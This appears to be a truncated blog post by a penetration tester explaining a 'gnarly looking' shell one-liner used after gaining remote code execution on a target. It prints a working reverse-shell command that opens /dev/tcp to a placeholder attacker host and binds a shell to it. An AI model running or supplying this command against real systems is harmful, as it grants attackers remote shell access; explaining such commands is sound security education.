Showing posts from April, 2020

"A Gnarly Looking Shell Command " Explained!

Here is a one-liner I recently used on an op that a teammate called a "gnarly looking shell command." And he was right. This is gnarly looking:

sh -c $@ | sh . echo 0<&196;exec 196<>/dev/tcp/X.X.X.X/NNN; sh <&196 >&196 2>&196
My team lead came up with it with it for me about a year ago on a gig where we had RCE but the easier shelling methods were failing. I saved it in my notes and pulled it out the other day because we had RCE on a similar target.
Anyway, seeing a command like that warrants pause and consideration unless you are fluent in command line interpreter lexical structures, and though I know enough to be dangerous, I wanted to better understand the magic of what was happening at a more technical level. So, I thought I would write this all down and share it with everyone.
While writing this blog post; I found some ways to clean it up a bit and make it easier to understand. Let's cover this version of it instead:
exec 196<>/…